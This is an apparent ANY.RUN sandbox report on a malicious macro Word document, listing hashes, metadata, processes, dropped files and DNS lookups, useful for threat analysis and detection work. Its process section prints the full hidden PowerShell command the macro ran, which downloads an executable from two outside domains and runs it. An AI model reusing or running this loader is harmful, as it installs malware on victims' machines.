analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

mal15

Full analysis: https://app.any.run/tasks/df67a0f4-935f-49e4-8897-fe7712a9fe99
Verdict: Malicious activity
Analysis date: December 14, 2018, 14:40:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: info, Author: admin, Template: Normal.dotm, Last Saved By: admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 19 10:36:00 2017, Last Saved Time/Date: Wed Apr 19 10:36:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

67B6FDFB7CBC5D976780D59962AEF3AF

SHA1:

DC7CBB8930AC6ED54A53EF6A1E3F4BD5A9A10BA9

SHA256:

B186F7AC98528867B2E703833C5C8A2FD760AC693BBD2E3AB9536EBB45B42E2A

SSDEEP:

3072:BBvfNwI+YVSDmh5IhsNZFM+pnKXaM5P3krUxTah6:jvfNXVS6hG8rwc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2944)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2944)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3796)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2944)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: info
Subject: -
Author: admin
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: admin
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2017:04:19 09:36:00
ModifyDate: 2017:04:19 09:36:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Company: home
Bytes: 106496
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
33
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2944"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\mal15.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3796powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://ostils.pl/file/polm.cvb,http://kopest.pl/file/polm.cvb'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 315
Read events
920
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6AA1.tmp.cvr
MD5:
SHA256:
3796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H5HJ4AVV62JAX6GCRFTJ.temp
MD5:
SHA256:
3796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247214.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2944WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5E2041FDA144453159427A44F1671FF2
SHA256:DADC67B011C595DC89FECEA682D77EFF235948180174F716411FB54E49BF309A
2944WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$mal15.docpgc
MD5:4AEF8BC04879BBC29E102F0B6F57079F
SHA256:02AA056DFA97F295E19C229C8B7E6D66894C0F724F5DE8EA65E875AA0392E34E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
ostils.pl
unknown
kopest.pl
unknown

Threats

No threats detected
No debug info